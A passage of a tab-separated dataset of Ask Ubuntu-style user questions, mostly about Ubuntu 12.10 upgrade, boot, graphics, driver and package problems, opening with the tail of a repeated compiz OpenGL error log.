compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : wall compiz ( core ) - error : failed to start plugin : wall compiz ( core ) - info : unloading plugin : wall compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : unitymtgrabhandles compiz ( core ) - error : failed to start plugin : unitymtgrabhandles compiz ( core ) - info : unloading plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : animation compiz ( core ) - error : failed to start plugin : animation compiz ( core ) - info : unloading plugin : animation compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : fade compiz ( core ) - error : failed to start plugin : fade compiz ( core ) - info : unloading plugin : fade compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : expo compiz ( core ) - error : failed to start plugin : expo compiz ( core ) - info : unloading plugin : expo compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : ezoom compiz ( core ) - error : failed to start plugin : ezoom compiz ( core ) - info : unloading plugin : ezoom compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : plugin init failed : scale compiz ( core ) - error : failed to start plugin : scale compiz ( core ) - info : unloading plugin : scale compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 segmentation fault ( core dumped )
204783	why the `` identifiant '' are n't replaced by the email-address in empathy ?	since the upgrade from ubuntu 12.04 to ubuntu 12.10 , i can not see the email address from my windows live friends in empathy . essentially , when i put the mouse over a contact , a little box will appear . in this box , the field that should containing the email address from my contact , displays ( for example ) : f1414df1f4g1g0 @ messenger.live.com edit : i just added a facebook chat profil in empathy , and i have the same problem with the identifiant . is this normal ? thanks in advance .
204786	unable to install 12.10 with pxe	i 'm trying to install ubuntu 12.10 with pxe ( cobbler ) and kickstart from a local server . at some point , the installation stops telling me it can not upload a file from mirror . the install log on the workstation looks fine and here 's the end of the log : net-retriever : gpgv : good signature from `` ubuntu cd image automatic signing key < cdimage @ ubuntu.com > '' anna [ 4222 ] : cat : ca n't open '/tmp/net-retriever-4226-deduplicate/* ' : no such file or directory i do n't see any errors ( 404 ) on the apache 's logs . i have a similar setup for 12.04 that works fine and the only difference is the use of ubuntu 's alternate cd . for 12.10 , i used the default iso i added manually the netboot folder to my installation image ( netboot.tar.gz uncompressed to install/netboot folder ) . pxe entry looks like this : label ubuntu-12.10-i386 kernel /images/ubuntu-12.10-i386/linux menu label ubuntu-12.10-i386 append initrd=/images/ubuntu-12.10-i386/initrd.gz ksdevice=bootif lang= preseed/url=http : //10.0.0.1/cblr/ks_mirror/ubuntu-12.10-i386/preseed/ubuntu.seed locale=en_us text kssendmac priority=critical ks=http : //10.0.0.1/cblr/svc/op/ks/profile/ubuntu-12.10-i386 kickstart file : # generated by kickstart configurator # platform=x86 # system language lang fr_ca # language modules to install langsupport fr_ca # system keyboard keyboard ca_multix # system mouse mouse # system timezone timezone america/montreal # root password rootpw -- disabled # initial user user administrateur -- fullname `` user '' -- iscrypted -- password *** # reboot after installation reboot # use text mode install text # install os instead of upgrade install # use cdrom installation media # cdrom # use network installation url -- url=http : //10.0.0.1/cblr/ks_mirror/ubuntu-12.10-i386 # system bootloader configuration bootloader -- location=mbr # clear the master boot record zerombr yes # partition clearing information clearpart -- all -- initlabel # disk partitioning information part /boot -- fstype ext4 -- size 512 -- asprimary part swap -- size 4096 part / -- fstype ext4 -- size 30720 part /home -- fstype ext4 -- size 1 -- grow # system authorization infomation auth -- useshadow -- enablemd5 # network information network -- bootproto=dhcp -- device=eth0 # firewall configuration firewall -- disabled # do not configure the x window system skipx % pre exec < /dev/tty6 > /dev/tty6 2 > /dev/tty6 chvt 6 machine= '' '' while [ `` $ machine '' == `` '' ] ; do echo -n `` machine name : `` read machine done echo `` machine= $ machine '' > /tmp/answers.txt domaine= '' '' while [ `` $ domain '' == `` '' ] ; do echo -n `` domain name : `` read domain done echo `` domain= $ domain '' > > /tmp/answers.txt chvt 1 exec < /dev/tty1 > /dev/tty1 2 > /dev/tty1 ...
204792	ragnarok online crashes in ubuntu 12.10 ( evolution-calendar-factory crashed )	i just recently updated my operating system from 12.04 to 12.10 and when i try to run ragnarok online through wine as i usually do , though it goes well for a while , after a few minutes my computer crashes completely and i 've got to un-plug the pc to restore it . after rebooting i get a report stating that executablepath /usr/lib/evolution/evolution-calendar-factory crashed . any idea what 's might be my problem and how to fix it ?
204793	how to edit nautilus side menu transparency and font color ?	i 've been trying to customize my ubuntu 12.04 unity desktop . i am describing what i 've done until now to make it easier to understand what is my practical question . please do n't refer to it as too localized . i like to have my desktop as clean and simple as possible , where the colors of the background image are shared by every other item . to accomplish this i edited the radiance theme . i used my unity for launcher color and transparency and also for top panel transparency . this is how it looks so far . now i am attempting to edit the nautilus color by following the instructions present in here . i want that the nautilus windows have the same color as the unity launcher . i used gcolor2 to pick the exact same color and then copy the hex code to the css file . the problem is i do n't know if it is possible or how to edit transparency in css files . besides , i also want to change the font color to white and i do n't know how . take a look at an example of a nautilus window . the color of the side menu is the same as the unity launcher , except the launcher and dash have transparency . also the font is barely readable and so i would like to change its color if possible . the question is if it is possible to set transparency on the side menu color and change the font color ? if so , how do i do it ? i ca n't find a gui for that purpose ( myunity and ubuntu tweak do n't have ) so i assume that it would require editing of css files .
204795	display issues when logging in	i have installed ubuntu 12.10 on my pc alongside windows 7 option . all seemed to be working fine . i installed chrome and filezilla , installed updates which had downloaded during the install , rebooted , and i get the usual boot options ( launch ubuntu , ubuntu with linux , memory test , and boot windows 7 on sdb1 ) . booting into windows 7 is fine . when i select 'launch ubuntu ' it proceeds to the unity greeter . however , when i enter my credentials , i then have display issues . the screen becomes smaller , leaving a black border around the screen , almost as if i 'm using a lower resolution than my monitor allows , shows my desktop wallpaper , and does nothing . pressing ctrl + alt + del allows me to log off which i can then reboot from the top right , but that is all . pc specs : intel core 2 duo 2.7ghz - 4gb ram - nvidia geforce gt 220 - 1tb wd hard drive ( 7200rpm ) these specs ran windows 7 ultimate fine , with all the aero graphics , so that surely can not be the issue .
204797	blinking curser at login	sometimes after my laptop boots up there is a blinking curser on the top left side of the screen , i can still login via unity , after login everything works but the curser is still there blinking , it messes up the launcher bar somewhat as well , has anyone else seen/experienced this ? this seemed to start in 12.10
204803	freezing on logout / disconnected ssh connection	i have been having my ubuntu desktop freeze occasionally when logging out of a graphical session ( using computer locally ) , or when a remote ssh login ( openssh running on the desktop ) is disconnected . in the case of logging out , i see some white text on the screen listing what it is doing , and then it just stops . i have to hold the power button to recover . for ssh usage , the computer will lock up occasionally if my ssh session from my laptop ends irregularly . for example , if i forget i am logged in and it auto-disconnects me , or if i lose internet connection , or if i sleep the laptop and the session times out . since both incidents involve a sort of for the ssh freeze i have not been able to find any errors in the ssh server log or the system log . the logs simply just end when the os froze . this problem has occurred on both 12.04 and 12.10 ( both 64bit ) . i am using a pre-configured hp compaq 8200 elite small form factor . it has an i7-2700k cpu with the intel 3000hd integrated gpu and 12gb of ram . i am unsure how to proceed in diagnosing/correcting this problem . thank you very much for your assistance !
204804	broken theme after upgrading to 12.10	i just upgraded my pc from 12.04 to 12.10 . everything goes fine , but after all i get into some troubles with ambiance theme ( screenshot ) , on right-click menu , or file menu ; text have background what makes it unreadable . in 12.04 everything was fine , after updating i do not enable any additional ppa . i also try reinstalling light-themes . every other themes work normally .
204806	how change show application key to apple mouse ?	i want to change shortcut `` show all application '' ( default super+w ) to apple mouse ( click in one time left and right button ) . is this possible ?
204811	upgraded to 12.04 always freezing	i never had a problem with ubuntu 10.04 till i upgraded to 12.04 , now i am freezing all the time , having problem rebooting , it 's a nightmare . does anyone know what is happening and what i can do ? i am no real ubuntu literate .
204813	gnome lock screen ( screensaver ) is missing music controls	i have a custom ubuntu 12.10 configuration ( started out as a minimal installation of ubuntu 12.04 with a number of other packages such as gnome shell selectively installed via apt-get and then upgraded to 12.10 ) . ( almost ) everything works just fine . however , the lock screen ( gnome screensaver ) does not expose a ui to control music playback . whenever i have rhythmbox running in the background i can not pause music playback without unlocking the screen . obviously some package ( s ) or configuration bits are not present but i am not able to figure out what needs to be added or done in order to enable playback control in the lock screen . any idea what i might be missing ? ideally i would not like to install ubuntu desktop only to get music controls in the gnome lock screen .
204818	single yellow characters on mac when ubuntu is booting	i have burned a ubuntu disk and am booting from it on my mac . however , it keeps going to a black screen with a single yellow character on a burgundy background . usually an s and a weird 単 . when booting it always displays a little icon in the bottom of the screen which looks like a keyboard , followed by an arrow , followed by a person in a circe . sometimes the install/check disk/etc menu comes up before the weird yellow symbol , sometimes it does n't at all . when the symbol is up , no amount of pressing buttons or anything works . is this a mac hardware problem ? is my disk bad ? thanks , sam
204821	partitions for ubuntu and windows 7 dual boot on ssd + hdd setup	i have purchased a new ssd ( 120gb ) and i had a hdd ( 1tb ) already installed . i will install both ubuntu and windows on these drives . as the file space on the ssd is limited and i 've read that writing to an ssd drive is discouraged , i would like to store most of the data on the hdd drive . i am aiming at faster system but also keeping the valuable data safe on the more reliable hdd and expanding the life span of the ssd . i have already set up windows on these drives ( system files and applications on ssd , users folder and programdata on hdd ) and now it 's time to set up ubuntu . so my question is which partitions i should create , on which drive should they be placed and how large they should be . based on my experience and articles i 've read , i will probably create /swap , /home and / partitions . does it seem reasonable to place /swap and /home partitions on the hdd and / on the ssd ? and how large should / partition be ? also , will the applications be installed in / partition ? if so , is it rational to store the applications on separate partitions on the hdd instead of / on the ssd , and what should the size of the / partition be in this case ?
204822	lirc ( remote control daemon ) does n't work	i have pinnacle 's analog tv pci card with remote ( ir ) controller . i want to use this remote controller to control xbmc . i 've read that i need lirc daemon so i installed it ( sudo apt-get install lirc ) and selected pinnacle systems pctv ( pro ) reciever as remote control configuration ( during lirc setup ) . for ir transmitter i selected none ( afaik i do n't have it ) . now the problems arise ( cut out ) : setting up lirc ( 0.9.0-0ubuntu1 ) ... ls : can not access /lib/modules/3.2.0-23-generic/kernel/drivers/staging/lirc : no such file or directory * loading lirc modules [ ok ] find : `/sys/class/rc/*/ ' : no such file or directory * starting remote control daemon ( s ) : lirc [ fail ] here is my /etc/lirc/hardware.conf . i 've also tried this workaround sudo ln -s /lib/modules/3.2.0-23-generic/kernel/drivers/staging/media/lirc /lib/modules/3.2.0-23-generic/kernel/drivers/staging/lirc but it does n't work . how to make use of this remote control before i throw it out the window ? : )
204823	how do you change the default document viewer to okular ?	i have just started using okular and i love it . it has a lot of functionality that i need when i am in pdfs and it already opens up epubs automatically . how to i get it to open pdfs by default instead of `` document viewer ? '' i appreciate the help !
204828	installed windows 7 with ubuntu 12 and grub is n't there ?	i had ubuntu first , installed windows later , and for a short period of time i could choose the os to boot into from the windows boot , and now it does n't even give me a choice , just boots right into windows . i have about 200gb of data on the ubuntu partition , and i need a way to boot back in . how can i resolve this issue ?
204829	can the shopping lens be changed to display results from amazon.co.uk ?	how can i configure the dash 's shopping lens to fetch its search results from www.amazon.co.uk instead of www.amazon.com ? is there any program for controlling the lenses or another settings under unity for customizing them ?
204830	installing additional drivers without internet connection	i have an acer aspire 3690 laptop who 's ethernet adapter is not working due to irq conflict with the mouse ( report during startup ... .press f1 to continue or f2 to setup ) . i tried to see and change settings in setup but there is not much other than boot menu that can be changed and could solve the broblem . i 've installed ubuntu 12.04 but the wireless driver is not working . when running the additional drivers app , it does reports that it wants to install the broadcom sta wireless driver , but i have no ethernet connection to at least install the correct drivers for the wireless adapter . any ideas how to fix my dilemma ?
204835	theme isnt changing using gnome tweak tool	in 12.04 i used unity and was able to change the theme with the gnome-tweak-tool . since the update to 12.10 i use gnome and try to change the theme however nothing changes except the top bar which i changed in a different way . i applied the theme with the tweak tool and i logged out and in again , i even tried it with restarting the pc and that didnt work either . i hope you can help me . screenshot : sorry dont know how to put the picture inside -.-
204839	how i can type in the malayalam language ?	how i can type malayalam language in ubuntu 12.10 ? i used to use ibus with m17n library on my ubuntu 12.04 . but after a fresh installation of 12.10 , m17n is no more available on ibus .
204840	dependency error while installing wine	every time i try to install `` wine '' via the software center on ubuntu 12.10 , i get this error : the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.7ubuntu6 is to be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu20 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu1 ) but 1.4.1-0ubuntu1 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) but it is not going to be installed when i try installing it via the terminal , this is what i get : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.4 : depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : ttf-droid recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : ttf-umefont but it is not going to be installed recommends : ttf-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . how do i fix this ?
204842	12.10 on hp tx1000 problems	ubuntu 12.10 is running very slowly on my old hp tx1000 . graphics are flickering , text cut , icons broke , lines across the screen , wifi does n't work . did i mention it 's very slow . should i throw the computer away or put 12.04 back on ?
204843	system shortcut setting is always restored to default	i changed the `` hide all normal windows '' keyboard shortcut to super + d ( from ctrl + super + d ) in system settings/keyboard/shortcuts . it works for some time , but finally it 's always set back to ctrl + super + d. i have experienced problems with other shortuct settings as well , only custom shortcuts seem to work . am i doing something wrong ? [ 12.10 quantal ]
204846	grub fails to install on upgrade 12.04- > 12.10 ( fakeraid )	i have a gigabyte x85a-ud3r motherboard with an ich10r . i also have a raid 0 ( striping ) setup of 2x1tb disks , configured at the bios level ( raid controler which boots before os/after bios ? ) which merges the two physical volumes into one 2tb volume labelled mainvolume . the volume contains four primary partitions - two for windows ( boot and data ) and two for linux ( root and swap ) , no logical partitions . i had problems installing any ubuntu after 10.04 on this setup . in fact , i installed 12.04 by installing 10.04 first and then upgrading . ubuntu 10.04 worked flawlessly , but after upgrade to 12.04 it always displayed a message during boot in the console , something like `` iwatch dm-5 failed '' ( not sure ) , but i did n't pay much attention to it because the system worked . up until today 's upgrade to 12.10 . today when i upgraded to 12.10 at the end of the upgrade process it tried to install grub , and failed with the message : path `/boot/grub ' is not readable by grub on boot . installation is impossible . aborting . then the upgrade manager offered me to select a destination for grub - sda , sdb or mainvolume . when i select mainvolume it falls back to the above error message and asks again . i did n't choose sda or sdb , because i thought it might write to the physical drives as non-striped and mess up existing partitions . in the end i chose not to install grub and completed the upgrade . i 'm writing this now from that box which i do n't dare to reboot since it might not boot . : ( any ideas & sugesstions ?
204848	photo lens does not work	the new photo lens in ubuntu 's 12.10 dash does not work for me . it simple shows nothing . all other lenses work like a charm . i have not switched off any sources in 'privacy settings ' . yes , i have photos in my photo folder . no , i have n't installed shotwell .
204855	continuous scrolling up of open application window when pointer hoving over	odd but extremely frustrating bug ! when the pointer is over any open window the page scrolls all the way to the top . if i want to remain at the current location of the page , application , or document , i need to move the pointer off to the side . this occurs when using text editor , chrome , firefox , and terminal . i have done some troubleshooting to following extent : i have windows 7 installed along side ubuntu 12.04 and this issue does not occur within the windows os ; i have turned off touchpad scrolling options , and i have utilized a mouse instead of the touchpad . for these reasons i do not believe it is related to the arrow key but an issue with the pointer or touchpad driver possibly ? one other odd note is that when i start up there is usually no issue for at least a few minutes , sometimes as long as 30 minutes , other times immediately . any ideas ? thanks ! tm
204859	is there an ubuntu app that connects to , plays , and/or manages google music ?	i 'm looking for a program that i can use for google music on my ubuntu desktop , that might integrate with unity , and be controlled by media keys . i 'm sure i might be most likely to see a webapp for it soon , but i 've been getting frustrated with webapps since i use chrome ( not chromium ) . i found a question/answer similar to this here , but i 'm looking for something more out-of-the-box than extending rhythmbox .
204864	rename - what does s// vs y// mean ?	the man page ( http : //manpages.ubuntu.com/manpages/dapper/man1/prename.1.html ) gives two examples : rename ’s/\.bak $ //’ *.bak rename ’y/a-z/a-z/’ * so it 's either s or y and then /replacethis/withthis what does the leading s and y mean ? are there other options ?
204868	ubuntu software center and update manager fail to open	after attempting to install google chrome i386 the installation failed . i then proceeded to the amd64 to see if it was the problem but ... ... my computer froze and i forced shut down . now apport has a message saying an error occurred please run package manager to fix the problem e : the package google-chrome-stable needs to be reinstalled but but i cant find an archive on it ) this usually means your packages have unmet dependencies . solution anyone ps : update manager does not work and i do n't have snyaptic . the file itself failed at the real real end and froze everything but the cursor .
204871	intellij idea odd ui behavior in 12.10	since i 've updated to 12.10 i 'm having a very bizarre behavior when running intellij . notice how the `` file '' menu is 2/3 of the screen down instead of where it 's supposed to be ? this is the case when i activate it using the mouse or the alt+f hot key . i am using a dual screen setup . intellij is currently maximized on screen 2 , and a console is maximized on screen 1 . the behavior is n't consistent , but if i use it long enough ( a few hours ) i usually observe it . the only non-standard plugin i have is ideavm . 2 part question . 1 . has anyone else observed this behavior in intellij or other apps ? 2 . any suggestions on how to fix it .
204872	how do i disable network connection at prelogin ?	-- - this question is related to ubuntu 12.10 , since previous versions did not connect to network before login -- - i had a bad boot today : the ubuntu screen was blocked at startup time , after a green [ ok ] and a white blinking underscore . in recovery mode i figured out the problem : networkmanager hung trying to connect to a wireless network that was n't available anymore , and so i could n't reach the prelogin level . anyway : i really do n't like that the pc connects to a network before the user logging in . how is it possible to disable it ?
204874	ubuntu 12.10 upgrade is stalled	my ubuntu is upgrading to 12.10 at the moment but since 4 hours or more i see only previous packages get restored and nothing happen . if i exit the upgrading now is all my previous data lost or does the computer boot my old ubuntu ? i had a problem that is similar to this before while installing linux on my fathers notebook . after the installation got crashed the computer was n't able to boot and i was n't able to reinstall it . i need help i do n't know what to do now .
204893	learning the base for programming in c	it 's been a while since i think about starting to programming in c and after that to learn programming in c # and i search a lot on google but could n't find a good guide to start learning base programming in c .however i found that eclipe integrates very good with ubuntu and it 's a good programming environment for starting to program in c but somebody can give please some links with guides or tell me where can i find the bases for starting to program in c , and i mean good base because i found a lot of incomplete guides over google ? and if i do n't ask to much please give some tips of how to start and how to use eclipse.every help will be welcome , thanks .
204897	how can switch ubuntu from hdd to ssd	i install windows in my ssd and also installed ubuntu in my hdd . how can i get rid of window in ssd and replace it with ubuntu in hdd , but also delete ubuntu in hdd
204899	where are these errors coming from	i would love any help with this just to help out i already ran these comands sudo apt-get clean sudo apt-get autoremove sudo apt-get update sudo apt-get upgrade sudo apt-get -f install
204900	are installed applications for all users or only for the account who installed them ?	i want to make different user accounts separate in ubuntu 12.04 for some applications only . my brother uses some applications i do n't want so more specifically , can i install application like `` wine '' or `` webapps '' in my account but have the application not appear in or affect other accounts ? ? the reason is that if i install wine it conflicts with the arabic fonts , causing problems on all accounts . so how can i install wine in an account and stop it from affecting/conflicting with all accounts .
204905	compaq presario r3000 randomly fails to boot on 11.10 , 12.04 , 12.10	iâm trying to figure what to do with random failures to boot . my old hp presario r3000 with amd athlon xp-m sometimes boots , sometimes hangs with a blank screen during boot , and sometimes hangs on shutdown . after a few boot attempts it will finally boot to the gnu grub screen where i usually can select recovery mode , then select return to a normal boot , and the thing will startup and function normally . the pattern is not repeatable and seemed to start after upgrading from 11.04 . clean installs of 12.04 and 12.10 on newly-formatted hard drives make no difference . if this might be a clue , hangs on shutdown often stop at a line with : pcmcia_socket pcmcia_socket0 : cs : io port probe 0x3000-0x7fff : excluding 0x3000-0x30ff 0x3400-0x34ff 0x3800-0x38ff 0x3c00-0x3cff i did try the acpi=off modification from 11.10 randomly fails to boot on compaq presario r3000 with no change in these random boot failures . any suggestions sure appreciated .
204915	ubuntu 12.10 gcalctool simple mode only	i just installed ubuntu 12.10 and gnome 3 , i opened gcalctool and there is no way to change the base and the calc type . am i right or it 's just my stupidity ? here is a screenshot of it :
204919	logitech cordless mouse problem	i recently purchased a new toshiba laptop and a logitech m510 cordless mouse . i am running mint 13 on the laptop . initially ( at least once ) the mouse worked fine . then it ceased to work . i 've seached around on various fora and found reports of similar problems and various suggested solutions . one of the solutions was to switch the mouse off and remove the dongle from the laptop before booting . then log in . the wait ( at least ) 10 seconds before switching on the mouse and plugging in the dongle . this seems to work most of the time , but has failed to work at least once . i have seen a posting ( david gatrell , 2012-06-23 ) to the effect that '' this is really more a duplicate of bug # 958174 , which is still open . '' but as far as i can discern there has been no `` activity '' on this bug since the given date . and i 'm not sure that this applies to mint 13 ( or only to `` real '' ubuntu ( 12.04 ? 12.10 ? ) . has anyone any ideas as to how i can get reliable performance out of this cordless mouse ?
204920	unable to use autohide launcher in 12.10	i upgraded ubuntu from 12.04 to 12.10 . everything went well but the launcher does not show when i move the mouse cursor on it . my computer is hp pavillion p6582l , core i5 , 4gb of ram , nvidia geforce gf315 3d graphic card . please tell me how to fix this problem .
204923	how to bind a character device in /dev directory as the keyboard ?	i have written an character device , i want to declare it as the keyboard and use it to generate events from the virtual keyboard ?
204925	how to setup an apt server	at my place of work we have some commercial applications that we want to deploy to ubuntu machines internally and keep them up to date . we are wondering if we can achieve this by settings up an internal apt server which will host the debian packages . and have our internal users access this similar to a ppa ( this seems to be what google does with chrome ) is it possible to setup an internal apt server ? and if so how do we do it ?
204928	how to install side by side boot on windows xp	i have looked at other questions but none seem to help my problem . i am trying to install the latest version of ubuntu off a usb stick side by side with windows xp . i have it booted up but when i get to the install page the only options are erase hard drive or `` something else '' . i do n't want to destroy anything messing with partitions , so if that is the answer please be specific and detailed ... thanks
204929	how can i install service pack 2 and 3 for office 2007 using playonlinux ?	i installed the latest version of playonlinux using the instructions given on their download page ( http : //www.playonlinux.com/en/download.html ) for ubuntu 12.04 ( precise pangolin ) . i followed the instructions to install playonlinux , but it seems it installed wine 1.2.3 ( x86 ) . according to winehq , versions after 1.3.21 should be able to install the service packs perfectly . ( http : //appdb.winehq.org/objectmanager.php ? sclass=version & iid=4992 ) to get the updates installed , i added wine 1.5.14 ( x86 ) through playonlinux but when i opened word 2007 under that version of wine both wine and word 2007 crashed . now i 'm not sure where to start or what to do . i 'm a novice to wine in general so any detailed help would be much appreciated .
204934	macbook pro 5.5 compatibility issues with 12.10	i 'm trying to figure out how the compatibility for the macbook pro 5.5 is now , with the new release of ubuntu 12.10 . i have tried several times with the previous 12. ? ? releases , and it always seemed to run hotter than normal and have a couple kinks with drivers and what not . so out of fear of burning out my laptop , i 've had to force myself to wait with hopes of a brighter future , haha . i really want to move on to ubuntu for good , and heard a lot of compatibility issues have been fixed . if anyone could shine some light on the situation , it would be great . again , i would love to finally use ubuntu as my primary os finally . thanks , barkerto
